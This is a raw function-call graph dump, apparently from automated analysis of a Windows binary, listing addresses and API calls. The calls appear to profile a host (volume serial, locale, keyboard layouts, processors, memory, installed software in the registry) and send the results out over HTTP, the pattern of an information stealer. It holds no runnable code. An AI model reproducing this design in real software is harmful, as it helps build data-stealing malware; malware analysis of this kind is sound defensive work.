14627->14597 14627->14599 14627->14607 14627->14608 14627->14621 14627->14623 14627->14625 14627->14626 14629 577553 GetVolumeInformationA 14628->14629 14630 57754c 14628->14630 14631 577591 14629->14631 14630->14629 14632 5775fc GetProcessHeap RtlAllocateHeap 14631->14632 14633 577619 14632->14633 14634 577628 wsprintfA 14632->14634 14636 57a740 lstrcpy 14633->14636 14635 57a740 lstrcpy 14634->14635 14637 575da7 14635->14637 14636->14637 14637->13701 14639 57a7a0 lstrcpy 14638->14639 14640 564899 14639->14640 15690 5647b0 14640->15690 14642 5648a5 14643 57a740 lstrcpy 14642->14643 14644 5648d7 14643->14644 14645 57a740 lstrcpy 14644->14645 14646 5648e4 14645->14646 14647 57a740 lstrcpy 14646->14647 14648 5648f1 14647->14648 14649 57a740 lstrcpy 14648->14649 14650 5648fe 14649->14650 14651 57a740 lstrcpy 14650->14651 14652 56490b InternetOpenA StrCmpCA 14651->14652 14653 564944 14652->14653 14654 564ecb InternetCloseHandle 14653->14654 15696 578b60 14653->15696 14655 564ee8 14654->14655 15711 569ac0 CryptStringToBinaryA 14655->15711 14657 564963 15704 57a920 14657->15704 14660 564976 14662 57a8a0 lstrcpy 14660->14662 14667 56497f 14662->14667 14663 57a820 2 API calls 14664 564f05 14663->14664 14665 57a9b0 4 API calls 14664->14665 14668 564f1b 14665->14668 14666 564f27 codecvt 14669 57a7a0 lstrcpy 14666->14669 14671 57a9b0 4 API calls 14667->14671 14670 57a8a0 lstrcpy 14668->14670 14682 564f57 14669->14682 14670->14666 14672 5649a9 14671->14672 14673 57a8a0 lstrcpy 14672->14673 14674 5649b2 14673->14674 14675 57a9b0 4 API calls 14674->14675 14676 5649d1 14675->14676 14677 57a8a0 lstrcpy 14676->14677 14678 5649da 14677->14678 14679 57a920 3 API calls 14678->14679 14680 5649f8 14679->14680 14681 57a8a0 lstrcpy 14680->14681 14683 564a01 14681->14683 14682->13704 14684 57a9b0 4 API calls 14683->14684 14685 564a20 14684->14685 14686 57a8a0 lstrcpy 14685->14686 14687 564a29 14686->14687 14688 57a9b0 4 API calls 14687->14688 14689 564a48 14688->14689 14690 57a8a0 lstrcpy 
14689->14690 14691 564a51 14690->14691 14692 57a9b0 4 API calls 14691->14692 14693 564a7d 14692->14693 14694 57a920 3 API calls 14693->14694 14695 564a84 14694->14695 14696 57a8a0 lstrcpy 14695->14696 14697 564a8d 14696->14697 14698 564aa3 InternetConnectA 14697->14698 14698->14654 14699 564ad3 HttpOpenRequestA 14698->14699 14701 564ebe InternetCloseHandle 14699->14701 14702 564b28 14699->14702 14701->14654 14703 57a9b0 4 API calls 14702->14703 14704 564b3c 14703->14704 14705 57a8a0 lstrcpy 14704->14705 14706 564b45 14705->14706 14707 57a920 3 API calls 14706->14707 14708 564b63 14707->14708 14709 57a8a0 lstrcpy 14708->14709 14710 564b6c 14709->14710 14711 57a9b0 4 API calls 14710->14711 14712 564b8b 14711->14712 14713 57a8a0 lstrcpy 14712->14713 14714 564b94 14713->14714 14715 57a9b0 4 API calls 14714->14715 14716 564bb5 14715->14716 14717 57a8a0 lstrcpy 14716->14717 14718 564bbe 14717->14718 14719 57a9b0 4 API calls 14718->14719 14720 564bde 14719->14720 14721 57a8a0 lstrcpy 14720->14721 14722 564be7 14721->14722 14723 57a9b0 4 API calls 14722->14723 14724 564c06 14723->14724 14725 57a8a0 lstrcpy 14724->14725 14726 564c0f 14725->14726 14727 57a920 3 API calls 14726->14727 14728 564c2d 14727->14728 14729 57a8a0 lstrcpy 14728->14729 14730 564c36 14729->14730 14731 57a9b0 4 API calls 14730->14731 14732 564c55 14731->14732 14733 57a8a0 lstrcpy 14732->14733 14734 564c5e 14733->14734 14735 57a9b0 4 API calls 14734->14735 14736 564c7d 14735->14736 14737 57a8a0 lstrcpy 14736->14737 14738 564c86 14737->14738 14739 57a920 3 API calls 14738->14739 14740 564ca4 14739->14740 14741 57a8a0 lstrcpy 14740->14741 14742 564cad 14741->14742 14743 57a9b0 4 API calls 14742->14743 14744 564ccc 14743->14744 14745 57a8a0 lstrcpy 14744->14745 14746 564cd5 14745->14746 14747 57a9b0 4 API calls 14746->14747 14748 564cf6 14747->14748 14749 57a8a0 lstrcpy 14748->14749 14750 564cff 14749->14750 14751 57a9b0 4 API calls 14750->14751 14752 564d1f 14751->14752 14753 57a8a0 lstrcpy 14752->14753 
14754 564d28 14753->14754 14755 57a9b0 4 API calls 14754->14755 14756 564d47 14755->14756 14757 57a8a0 lstrcpy 14756->14757 14758 564d50 14757->14758 14759 57a920 3 API calls 14758->14759 14760 564d6e 14759->14760 14761 57a8a0 lstrcpy 14760->14761 14762 564d77 14761->14762 14763 57a740 lstrcpy 14762->14763 14764 564d92 14763->14764 14765 57a920 3 API calls 14764->14765 14766 564db3 14765->14766 14767 57a920 3 API calls 14766->14767 14768 564dba 14767->14768 14769 57a8a0 lstrcpy 14768->14769 14770 564dc6 14769->14770 14771 564de7 lstrlen 14770->14771 14772 564dfa 14771->14772 14773 564e03 lstrlen 14772->14773 15710 57aad0 14773->15710 14775 564e13 HttpSendRequestA 14776 564e32 InternetReadFile 14775->14776 14777 564e67 InternetCloseHandle 14776->14777 14782 564e5e 14776->14782 14780 57a800 14777->14780 14779 57a9b0 4 API calls 14779->14782 14780->14701 14781 57a8a0 lstrcpy 14781->14782 14782->14776 14782->14777 14782->14779 14782->14781 15717 57aad0 14783->15717 14785 5717c4 StrCmpCA 14786 5717d7 14785->14786 14787 5717cf ExitProcess 14785->14787 14788 571913 StrCmpCA 14786->14788 14789 571932 StrCmpCA 14786->14789 14790 5718f1 StrCmpCA 14786->14790 14791 571951 StrCmpCA 14786->14791 14792 571970 StrCmpCA 14786->14792 14793 57187f StrCmpCA 14786->14793 14794 57185d StrCmpCA 14786->14794 14795 5718cf StrCmpCA 14786->14795 14796 5718ad StrCmpCA 14786->14796 14797 5719c2 14786->14797 14798 57a820 lstrlen lstrcpy 14786->14798 14788->14786 14789->14786 14790->14786 14791->14786 14792->14786 14793->14786 14794->14786 14795->14786 14796->14786 14797->13706 14798->14786 14800 57a7a0 lstrcpy 14799->14800 14801 565979 14800->14801 14802 5647b0 2 API calls 14801->14802 14803 565985 14802->14803 14804 57a740 lstrcpy 14803->14804 14805 5659ba 14804->14805 14806 57a740 lstrcpy 14805->14806 14807 5659c7 14806->14807 14808 57a740 lstrcpy 14807->14808 14809 5659d4 14808->14809 14810 57a740 lstrcpy 14809->14810 14811 5659e1 14810->14811 14812 57a740 lstrcpy 14811->14812 14813 5659ee 
InternetOpenA StrCmpCA 14812->14813 14814 565a1d 14813->14814 14815 565fc3 InternetCloseHandle 14814->14815 14816 578b60 3 API calls 14814->14816 14817 565fe0 14815->14817 14818 565a3c 14816->14818 14820 569ac0 4 API calls 14817->14820 14819 57a920 3 API calls 14818->14819 14821 565a4f 14819->14821 14822 565fe6 14820->14822 14823 57a8a0 lstrcpy 14821->14823 14824 57a820 2 API calls 14822->14824 14827 56601f codecvt 14822->14827 14829 565a58 14823->14829 14825 565ffd 14824->14825 14826 57a9b0 4 API calls 14825->14826 14828 566013 14826->14828 14831 57a7a0 lstrcpy 14827->14831 14830 57a8a0 lstrcpy 14828->14830 14832 57a9b0 4 API calls 14829->14832 14830->14827 14840 56604f 14831->14840 14833 565a82 14832->14833 14834 57a8a0 lstrcpy 14833->14834 14835 565a8b 14834->14835 14836 57a9b0 4 API calls 14835->14836 14837 565aaa 14836->14837 14838 57a8a0 lstrcpy 14837->14838 14839 565ab3 14838->14839 14841 57a920 3 API calls 14839->14841 14840->13712 14842 565ad1 14841->14842 14843 57a8a0 lstrcpy 14842->14843 14844 565ada 14843->14844 14845 57a9b0 4 API calls 14844->14845 14846 565af9 14845->14846 14847 57a8a0 lstrcpy 14846->14847 14848 565b02 14847->14848 14849 57a9b0 4 API calls 14848->14849 14850 565b21 14849->14850 14851 57a8a0 lstrcpy 14850->14851 14852 565b2a 14851->14852 14853 57a9b0 4 API calls 14852->14853 14854 565b56 14853->14854 14855 57a920 3 API calls 14854->14855 14856 565b5d 14855->14856 14857 57a8a0 lstrcpy 14856->14857 14858 565b66 14857->14858 14859 565b7c InternetConnectA 14858->14859 14859->14815 14860 565bac HttpOpenRequestA 14859->14860 14862 565fb6 InternetCloseHandle 14860->14862 14863 565c0b 14860->14863 14862->14815 14864 57a9b0 4 API calls 14863->14864 14865 565c1f 14864->14865 14866 57a8a0 lstrcpy 14865->14866 14867 565c28 14866->14867 14868 57a920 3 API calls 14867->14868 14869 565c46 14868->14869 14870 57a8a0 lstrcpy 14869->14870 14871 565c4f 14870->14871 14872 57a9b0 4 API calls 14871->14872 14873 565c6e 14872->14873 14874 57a8a0 lstrcpy 
14873->14874 14875 565c77 14874->14875 14876 57a9b0 4 API calls 14875->14876 14877 565c98 14876->14877 14878 57a8a0 lstrcpy 14877->14878 14879 565ca1 14878->14879 14880 57a9b0 4 API calls 14879->14880 14881 565cc1 14880->14881 14882 57a8a0 lstrcpy 14881->14882 14883 565cca 14882->14883 14884 57a9b0 4 API calls 14883->14884 14885 565ce9 14884->14885 14886 57a8a0 lstrcpy 14885->14886 14887 565cf2 14886->14887 14888 57a920 3 API calls 14887->14888 14889 565d10 14888->14889 14890 57a8a0 lstrcpy 14889->14890 14891 565d19 14890->14891 14892 57a9b0 4 API calls 14891->14892 14893 565d38 14892->14893 14894 57a8a0 lstrcpy 14893->14894 14895 565d41 14894->14895 14896 57a9b0 4 API calls 14895->14896 14897 565d60 14896->14897 14898 57a8a0 lstrcpy 14897->14898 14899 565d69 14898->14899 14900 57a920 3 API calls 14899->14900 14901 565d87 14900->14901 14902 57a8a0 lstrcpy 14901->14902 14903 565d90 14902->14903 14904 57a9b0 4 API calls 14903->14904 14905 565daf 14904->14905 14906 57a8a0 lstrcpy 14905->14906 14907 565db8 14906->14907 14908 57a9b0 4 API calls 14907->14908 14909 565dd9 14908->14909 14910 57a8a0 lstrcpy 14909->14910 14911 565de2 14910->14911 14912 57a9b0 4 API calls 14911->14912 14913 565e02 14912->14913 14914 57a8a0 lstrcpy 14913->14914 14915 565e0b 14914->14915 14916 57a9b0 4 API calls 14915->14916 14917 565e2a 14916->14917 14918 57a8a0 lstrcpy 14917->14918 14919 565e33 14918->14919 14920 57a920 3 API calls 14919->14920 14921 565e54 14920->14921 14922 57a8a0 lstrcpy 14921->14922 14923 565e5d 14922->14923 14924 565e70 lstrlen 14923->14924 15718 57aad0 14924->15718 14926 565e81 lstrlen GetProcessHeap RtlAllocateHeap 15719 57aad0 14926->15719 14928 565eae lstrlen 14929 565ebe 14928->14929 14930 565ed7 lstrlen 14929->14930 14931 565ee7 14930->14931 14932 565ef0 lstrlen 14931->14932 14933 565f04 14932->14933 14934 565f1a lstrlen 14933->14934 15720 57aad0 14934->15720 14936 565f2a HttpSendRequestA 14937 565f35 InternetReadFile 14936->14937 14938 565f6a InternetCloseHandle 
14937->14938 14942 565f61 14937->14942 14938->14862 14940 57a9b0 4 API calls 14940->14942 14941 57a8a0 lstrcpy 14941->14942 14942->14937 14942->14938 14942->14940 14942->14941 14945 571077 14943->14945 14944 571151 14944->13714 14945->14944 14946 57a820 lstrlen lstrcpy 14945->14946 14946->14945 14948 570db7 14947->14948 14949 570f17 14948->14949 14950 570e27 StrCmpCA 14948->14950 14951 570e67 StrCmpCA 14948->14951 14952 570ea4 StrCmpCA 14948->14952 14953 57a820 lstrlen lstrcpy 14948->14953 14949->13722 14950->14948 14951->14948 14952->14948 14953->14948 14957 570f67 14954->14957 14955 571044 14955->13730 14956 570fb2 StrCmpCA 14956->14957 14957->14955 14957->14956 14958 57a820 lstrlen lstrcpy 14957->14958 14958->14957 14960 57a740 lstrcpy 14959->14960 14961 571a26 14960->14961 14962 57a9b0 4 API calls 14961->14962 14963 571a37 14962->14963 14964 57a8a0 lstrcpy 14963->14964 14965 571a40 14964->14965 14966 57a9b0 4 API calls 14965->14966 14967 571a5b 14966->14967 14968 57a8a0 lstrcpy 14967->14968 14969 571a64 14968->14969 14970 57a9b0 4 API calls 14969->14970 14971 571a7d 14970->14971 14972 57a8a0 lstrcpy 14971->14972 14973 571a86 14972->14973 14974 57a9b0 4 API calls 14973->14974 14975 571aa1 14974->14975 14976 57a8a0 lstrcpy 14975->14976 14977 571aaa 14976->14977 14978 57a9b0 4 API calls 14977->14978 14979 571ac3 14978->14979 14980 57a8a0 lstrcpy 14979->14980 14981 571acc 14980->14981 14982 57a9b0 4 API calls 14981->14982 14983 571ae7 14982->14983 14984 57a8a0 lstrcpy 14983->14984 14985 571af0 14984->14985 14986 57a9b0 4 API calls 14985->14986 14987 571b09 14986->14987 14988 57a8a0 lstrcpy 14987->14988 14989 571b12 14988->14989 14990 57a9b0 4 API calls 14989->14990 14991 571b2d 14990->14991 14992 57a8a0 lstrcpy 14991->14992 14993 571b36 14992->14993 14994 57a9b0 4 API calls 14993->14994 14995 571b4f 14994->14995 14996 57a8a0 lstrcpy 14995->14996 14997 571b58 14996->14997 14998 57a9b0 4 API calls 14997->14998 14999 571b76 14998->14999 15000 57a8a0 lstrcpy 
14999->15000 15001 571b7f 15000->15001 15002 577500 6 API calls 15001->15002 15003 571b96 15002->15003 15004 57a920 3 API calls 15003->15004 15005 571ba9 15004->15005 15006 57a8a0 lstrcpy 15005->15006 15007 571bb2 15006->15007 15008 57a9b0 4 API calls 15007->15008 15009 571bdc 15008->15009 15010 57a8a0 lstrcpy 15009->15010 15011 571be5 15010->15011 15012 57a9b0 4 API calls 15011->15012 15013 571c05 15012->15013 15014 57a8a0 lstrcpy 15013->15014 15015 571c0e 15014->15015 15721 577690 GetProcessHeap RtlAllocateHeap 15015->15721 15018 57a9b0 4 API calls 15019 571c2e 15018->15019 15020 57a8a0 lstrcpy 15019->15020 15021 571c37 15020->15021 15022 57a9b0 4 API calls 15021->15022 15023 571c56 15022->15023 15024 57a8a0 lstrcpy 15023->15024 15025 571c5f 15024->15025 15026 57a9b0 4 API calls 15025->15026 15027 571c80 15026->15027 15028 57a8a0 lstrcpy 15027->15028 15029 571c89 15028->15029 15728 5777c0 GetCurrentProcess IsWow64Process 15029->15728 15032 57a9b0 4 API calls 15033 571ca9 15032->15033 15034 57a8a0 lstrcpy 15033->15034 15035 571cb2 15034->15035 15036 57a9b0 4 API calls 15035->15036 15037 571cd1 15036->15037 15038 57a8a0 lstrcpy 15037->15038 15039 571cda 15038->15039 15040 57a9b0 4 API calls 15039->15040 15041 571cfb 15040->15041 15042 57a8a0 lstrcpy 15041->15042 15043 571d04 15042->15043 15044 577850 3 API calls 15043->15044 15045 571d14 15044->15045 15046 57a9b0 4 API calls 15045->15046 15047 571d24 15046->15047 15048 57a8a0 lstrcpy 15047->15048 15049 571d2d 15048->15049 15050 57a9b0 4 API calls 15049->15050 15051 571d4c 15050->15051 15052 57a8a0 lstrcpy 15051->15052 15053 571d55 15052->15053 15054 57a9b0 4 API calls 15053->15054 15055 571d75 15054->15055 15056 57a8a0 lstrcpy 15055->15056 15057 571d7e 15056->15057 15058 5778e0 3 API calls 15057->15058 15059 571d8e 15058->15059 15060 57a9b0 4 API calls 15059->15060 15061 571d9e 15060->15061 15062 57a8a0 lstrcpy 15061->15062 15063 571da7 15062->15063 15064 57a9b0 4 API calls 15063->15064 15065 571dc6 15064->15065 
15066 57a8a0 lstrcpy 15065->15066 15067 571dcf 15066->15067 15068 57a9b0 4 API calls 15067->15068 15069 571df0 15068->15069 15070 57a8a0 lstrcpy 15069->15070 15071 571df9 15070->15071 15730 577980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15071->15730 15074 57a9b0 4 API calls 15075 571e19 15074->15075 15076 57a8a0 lstrcpy 15075->15076 15077 571e22 15076->15077 15078 57a9b0 4 API calls 15077->15078 15079 571e41 15078->15079 15080 57a8a0 lstrcpy 15079->15080 15081 571e4a 15080->15081 15082 57a9b0 4 API calls 15081->15082 15083 571e6b 15082->15083 15084 57a8a0 lstrcpy 15083->15084 15085 571e74 15084->15085 15732 577a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15085->15732 15088 57a9b0 4 API calls 15089 571e94 15088->15089 15090 57a8a0 lstrcpy 15089->15090 15091 571e9d 15090->15091 15092 57a9b0 4 API calls 15091->15092 15093 571ebc 15092->15093 15094 57a8a0 lstrcpy 15093->15094 15095 571ec5 15094->15095 15096 57a9b0 4 API calls 15095->15096 15097 571ee5 15096->15097 15098 57a8a0 lstrcpy 15097->15098 15099 571eee 15098->15099 15735 577b00 GetUserDefaultLocaleName 15099->15735 15102 57a9b0 4 API calls 15103 571f0e 15102->15103 15104 57a8a0 lstrcpy 15103->15104 15105 571f17 15104->15105 15106 57a9b0 4 API calls 15105->15106 15107 571f36 15106->15107 15108 57a8a0 lstrcpy 15107->15108 15109 571f3f 15108->15109 15110 57a9b0 4 API calls 15109->15110 15111 571f60 15110->15111 15112 57a8a0 lstrcpy 15111->15112 15113 571f69 15112->15113 15739 577b90 15113->15739 15115 571f80 15116 57a920 3 API calls 15115->15116 15117 571f93 15116->15117 15118 57a8a0 lstrcpy 15117->15118 15119 571f9c 15118->15119 15120 57a9b0 4 API calls 15119->15120 15121 571fc6 15120->15121 15122 57a8a0 lstrcpy 15121->15122 15123 571fcf 15122->15123 15124 57a9b0 4 API calls 15123->15124 15125 571fef 15124->15125 15126 57a8a0 lstrcpy 15125->15126 15127 571ff8 15126->15127 15751 577d80 GetSystemPowerStatus 15127->15751 15130 57a9b0 4 API calls 15131 572018 15130->15131 15132 57a8a0 
lstrcpy 15131->15132 15133 572021 15132->15133 15134 57a9b0 4 API calls 15133->15134 15135 572040 15134->15135 15136 57a8a0 lstrcpy 15135->15136 15137 572049 15136->15137 15138 57a9b0 4 API calls 15137->15138 15139 57206a 15138->15139 15140 57a8a0 lstrcpy 15139->15140 15141 572073 15140->15141 15142 57207e GetCurrentProcessId 15141->15142 15753 579470 OpenProcess 15142->15753 15145 57a920 3 API calls 15146 5720a4 15145->15146 15147 57a8a0 lstrcpy 15146->15147 15148 5720ad 15147->15148 15149 57a9b0 4 API calls 15148->15149 15150 5720d7 15149->15150 15151 57a8a0 lstrcpy 15150->15151 15152 5720e0 15151->15152 15153 57a9b0 4 API calls 15152->15153 15154 572100 15153->15154 15155 57a8a0 lstrcpy 15154->15155 15156 572109 15155->15156 15758 577e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15156->15758 15159 57a9b0 4 API calls 15160 572129 15159->15160 15161 57a8a0 lstrcpy 15160->15161 15162 572132 15161->15162 15163 57a9b0 4 API calls 15162->15163 15164 572151 15163->15164 15165 57a8a0 lstrcpy 15164->15165 15166 57215a 15165->15166 15167 57a9b0 4 API calls 15166->15167 15168 57217b 15167->15168 15169 57a8a0 lstrcpy 15168->15169 15170 572184 15169->15170 15762 577f60 15170->15762 15173 57a9b0 4 API calls 15174 5721a4 15173->15174 15175 57a8a0 lstrcpy 15174->15175 15176 5721ad 15175->15176 15177 57a9b0 4 API calls 15176->15177 15178 5721cc 15177->15178 15179 57a8a0 lstrcpy 15178->15179 15180 5721d5 15179->15180 15181 57a9b0 4 API calls 15180->15181 15182 5721f6 15181->15182 15183 57a8a0 lstrcpy 15182->15183 15184 5721ff 15183->15184 15775 577ed0 GetSystemInfo wsprintfA 15184->15775 15187 57a9b0 4 API calls 15188 57221f 15187->15188 15189 57a8a0 lstrcpy 15188->15189 15190 572228 15189->15190 15191 57a9b0 4 API calls 15190->15191 15192 572247 15191->15192 15193 57a8a0 lstrcpy 15192->15193 15194 572250 15193->15194 15195 57a9b0 4 API calls 15194->15195 15196 572270 15195->15196 15197 57a8a0 lstrcpy 15196->15197 15198 572279 15197->15198 15777 578100 GetProcessHeap 
RtlAllocateHeap 15198->15777 15201 57a9b0 4 API calls 15202 572299 15201->15202 15203 57a8a0 lstrcpy 15202->15203 15204 5722a2 15203->15204 15205 57a9b0 4 API calls 15204->15205 15206 5722c1 15205->15206 15207 57a8a0 lstrcpy 15206->15207 15208 5722ca 15207->15208 15209 57a9b0 4 API calls 15208->15209 15210 5722eb 15209->15210 15211 57a8a0 lstrcpy 15210->15211 15212 5722f4 15211->15212 15783 5787c0 15212->15783 15215 57a920 3 API calls 15216 57231e 15215->15216 15217 57a8a0 lstrcpy 15216->15217 15218 572327 15217->15218 15219 57a9b0 4 API calls 15218->15219 15220 572351 15219->15220 15221 57a8a0 lstrcpy 15220->15221 15222 57235a 15221->15222 15223 57a9b0 4 API calls 15222->15223 15224 57237a 15223->15224 15225 57a8a0 lstrcpy 15224->15225 15226 572383 15225->15226 15227 57a9b0 4 API calls 15226->15227 15228 5723a2 15227->15228 15229 57a8a0 lstrcpy 15228->15229 15230 5723ab 15229->15230 15788 5781f0 15230->15788 15232 5723c2 15233 57a920 3 API calls 15232->15233 15234 5723d5 15233->15234 15235 57a8a0 lstrcpy 15234->15235 15236 5723de 15235->15236 15237 57a9b0 4 API calls 15236->15237 15238 57240a 15237->15238 15239 57a8a0 lstrcpy 15238->15239 15240 572413 15239->15240 15241 57a9b0 4 API calls 15240->15241 15242 572432 15241->15242 15243 57a8a0 lstrcpy 15242->15243 15244 57243b 15243->15244 15245 57a9b0 4 API calls 15244->15245 15246 57245c 15245->15246 15247 57a8a0 lstrcpy 15246->15247 15248 572465 15247->15248 15249 57a9b0 4 API calls 15248->15249 15250 572484 15249->15250 15251 57a8a0 lstrcpy 15250->15251 15252 57248d 15251->15252 15253 57a9b0 4 API calls 15252->15253 15254 5724ae 15253->15254 15255 57a8a0 lstrcpy 15254->15255 15256 5724b7 15255->15256 15796 578320 15256->15796 15258 5724d3 15259 57a920 3 API calls 15258->15259 15260 5724e6 15259->15260 15261 57a8a0 lstrcpy 15260->15261 15262 5724ef 15261->15262 15263 57a9b0 4 API calls 15262->15263 15264 572519 15263->15264 15265 57a8a0 lstrcpy 15264->15265 15266 572522 15265->15266 15267 57a9b0 4 API calls 
15266->15267 15268 572543 15267->15268 15269 57a8a0 lstrcpy 15268->15269 15270 57254c 15269->15270 15271 578320 17 API calls 15270->15271 15272 572568 15271->15272 15273 57a920 3 API calls 15272->15273 15274 57257b 15273->15274 15275 57a8a0 lstrcpy 15274->15275 15276 572584 15275->15276 15277 57a9b0 4 API calls 15276->15277 15278 5725ae 15277->15278 15279 57a8a0 lstrcpy 15278->15279 15280 5725b7 15279->15280 15281 57a9b0 4 API calls 15280->15281 15282 5725d6 15281->15282 15283 57a8a0 lstrcpy 15282->15283 15284 5725df 15283->15284 15285 57a9b0 4 API calls 15284->15285 15286 572600 15285->15286 15287 57a8a0 lstrcpy 15286->15287 15288 572609 15287->15288 15832 578680 15288->15832 15290 572620 15291 57a920 3 API calls 15290->15291 15292 572633 15291->15292 15293 57a8a0 lstrcpy 15292->15293 15294 57263c 15293->15294 15295 57265a lstrlen 15294->15295 15296 57266a 15295->15296 15297 57a740 lstrcpy 15296->15297 15298 57267c 15297->15298 15299 561590 lstrcpy 15298->15299 15300 57268d 15299->15300 15842 575190 15300->15842 15302 572699 15302->13734 16030 57aad0 15303->16030 15305 565009 InternetOpenUrlA 15308 565021 15305->15308 15306 5650a0 InternetCloseHandle InternetCloseHandle 15309 5650ec 15306->15309 15307 56502a InternetReadFile 15307->15308 15308->15306 15308->15307 15309->13738 16031 5698d0 15310->16031 15312 570759 15313 57077d 15312->15313 15314 570a38 15312->15314 15316 570799 StrCmpCA 15313->15316 15315 561590 lstrcpy 15314->15315 15317 570a49 15315->15317 15318 570843 15316->15318 15319 5707a8 15316->15319 16207 570250 15317->16207 15324 570865 StrCmpCA 15318->15324 15321 57a7a0 lstrcpy 15319->15321 15323 5707c3 15321->15323 15326 561590 lstrcpy 15323->15326 15325 570874 15324->15325 15362 57096b 15324->15362 15327 57a740 lstrcpy 15325->15327 15328 57080c 15326->15328 15330 570881 15327->15330 15331 57a7a0 lstrcpy 15328->15331 15329 57099c StrCmpCA 15332 570a2d 15329->15332 15333 5709ab 15329->15333 15334 57a9b0 4 API calls 15330->15334 15335 570823 
15331->15335 15332->13742 15336 561590 lstrcpy 15333->15336 15337 5708ac 15334->15337 15338 57a7a0 lstrcpy 15335->15338 15339 5709f4 15336->15339 15340 57a920 3 API calls 15337->15340 15341 57083e 15338->15341 15342 57a7a0 lstrcpy 15339->15342 15343 5708b3 15340->15343 16034 56fb00 15341->16034 15345 570a0d 15342->15345 15346 57a9b0 4 API calls 15343->15346 15347 57a7a0 lstrcpy 15345->15347 15348 5708ba 15346->15348 15349 570a28 15347->15349 15350 57a8a0 lstrcpy 15348->15350 16150 570030 15349->16150 15362->15329 15682 57a7a0 lstrcpy 15681->15682 15683 561683 15682->15683 15684 57a7a0 lstrcpy 15683->15684 15685 561695 15684->15685 15686 57a7a0 lstrcpy 15685->15686 15687 5616a7 15686->15687 15688 57a7a0 lstrcpy 15687->15688 15689 5615a3 15688->15689 15689->14565 15691 5647c6 15690->15691 15692 564838 lstrlen 15691->15692 15716 57aad0 15692->15716 15694 564848 InternetCrackUrlA 15695 564867 15694->15695 15695->14642 15697 57a740 lstrcpy 15696->15697 15698 578b74 15697->15698 15699 57a740 lstrcpy 15698->15699 15700 578b82 GetSystemTime 15699->15700 15701 578b99 15700->15701 15702 57a7a0 lstrcpy 15701->15702 15703 578bfc 15702->15703 15703->14657 15705 57a931 15704->15705 15706 57a988 15705->15706 15708 57a968 lstrcpy lstrcat 15705->15708 15707 57a7a0 lstrcpy 15706->15707 15709 57a994 15707->15709 15708->15706 15709->14660 15710->14775 15712 564eee 15711->15712 15713 569af9 LocalAlloc 15711->15713 15712->14663 15712->14666 15713->15712 15714 569b14 CryptStringToBinaryA 15713->15714 15714->15712 15715 569b39 LocalFree 15714->15715 15715->15712 15716->15694 15717->14785 15718->14926 15719->14928 15720->14936 15849 5777a0 15721->15849 15724 5776c6 RegOpenKeyExA 15726 5776e7 RegQueryValueExA 15724->15726 15727 577704 RegCloseKey 15724->15727 15725 571c1e 15725->15018 15726->15727 15727->15725 15729 571c99 15728->15729 15729->15032 15731 571e09 15730->15731 15731->15074 15733 571e84 15732->15733 15734 577a9a wsprintfA 15732->15734 15733->15088 15734->15733 15736 571efe 
15735->15736 15737 577b4d 15735->15737 15736->15102 15856 578d20 LocalAlloc CharToOemW 15737->15856 15740 57a740 lstrcpy 15739->15740 15741 577bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15740->15741 15744 577c25 15741->15744 15742 577c46 GetLocaleInfoA 15742->15744 15743 577d18 15745 577d1e LocalFree 15743->15745 15746 577d28 15743->15746 15744->15742 15744->15743 15747 57a9b0 lstrcpy lstrlen lstrcpy lstrcat 15744->15747 15750 57a8a0 lstrcpy 15744->15750 15745->15746 15748 57a7a0 lstrcpy 15746->15748 15747->15744 15749 577d37 15748->15749 15749->15115 15750->15744 15752 572008 15751->15752 15752->15130 15754 5794b5 15753->15754 15755 579493 GetModuleFileNameExA CloseHandle 15753->15755 15756 57a740 lstrcpy 15754->15756 15755->15754 15757 572091 15756->15757 15757->15145 15759 572119 15758->15759 15760 577e68 RegQueryValueExA 15758->15760 15759->15159 15761 577e8e RegCloseKey 15760->15761 15761->15759 15763 577fb9 GetLogicalProcessorInformationEx 15762->15763 15764 577fd8 GetLastError 15763->15764 15769 578029 15763->15769 15765 578022 15764->15765 15774 577fe3 15764->15774 15768 572194 15765->15768 15771 5789f0 2 API calls 15765->15771 15768->15173 15770 5789f0 2 API calls 15769->15770 15772 57807b 15770->15772 15771->15768 15772->15765 15773 578084 wsprintfA 15772->15773 15773->15768 15774->15763 15774->15768 15857 5789f0 15774->15857 15860 578a10 GetProcessHeap RtlAllocateHeap 15774->15860 15776 57220f 15775->15776 15776->15187 15778 5789b0 15777->15778 15779 57814d GlobalMemoryStatusEx 15778->15779 15782 578163 __aulldiv 15779->15782 15780 57819b wsprintfA 15781 572289 15780->15781 15781->15201 15782->15780 15784 5787fb GetProcessHeap RtlAllocateHeap wsprintfA 15783->15784 15786 57a740 lstrcpy 15784->15786 15787 57230b 15786->15787 15787->15215 15789 57a740 lstrcpy 15788->15789 15795 578229 15789->15795 15790 578263 15791 57a7a0 lstrcpy 15790->15791 15793 5782dc 15791->15793 15792 57a9b0 lstrcpy lstrlen lstrcpy lstrcat 15792->15795 15793->15232 
15794 57a8a0 lstrcpy 15794->15795 15795->15790 15795->15792 15795->15794 15797 57a740 lstrcpy 15796->15797 15798 57835c RegOpenKeyExA 15797->15798 15799 5783d0 15798->15799 15800 5783ae 15798->15800 15802 578613 RegCloseKey 15799->15802 15803 5783f8 RegEnumKeyExA 15799->15803 15801 57a7a0 lstrcpy 15800->15801 15811 5783bd 15801->15811 15806 57a7a0 lstrcpy 15802->15806 15804 57843f wsprintfA RegOpenKeyExA 15803->15804 15805 57860e 15803->15805 15807 578485 RegCloseKey RegCloseKey 15804->15807 15808 5784c1 RegQueryValueExA 15804->15808 15805->15802 15806->15811 15812 57a7a0 lstrcpy 15807->15812 15809 578601 RegCloseKey 15808->15809 15810 5784fa lstrlen 15808->15810 15809->15805 15810->15809 15813 578510 15810->15813 15811->15258 15812->15811 15814 57a9b0 4 API calls 15813->15814 15815 578527 15814->15815 15816 57a8a0 lstrcpy 15815->15816 15817 578533 15816->15817 15818 57a9b0 4 API calls 15817->15818 15819 578557 15818->15819 15820 57a8a0 lstrcpy 15819->15820 15821 578563 15820->15821 15822 57856e RegQueryValueExA 15821->15822 15822->15809 15823 5785a3 15822->15823 15824 57a9b0 4 API calls 15823->15824 15825 5785ba 15824->15825 15826 57a8a0 lstrcpy 15825->15826 15827 5785c6 15826->15827 15828 57a9b0 4 API calls 15827->15828 15829 5785ea 15828->15829 15830 57a8a0 lstrcpy 15829->15830 15831 5785f6 15830->15831 15831->15809 15833 57a740 lstrcpy 15832->15833 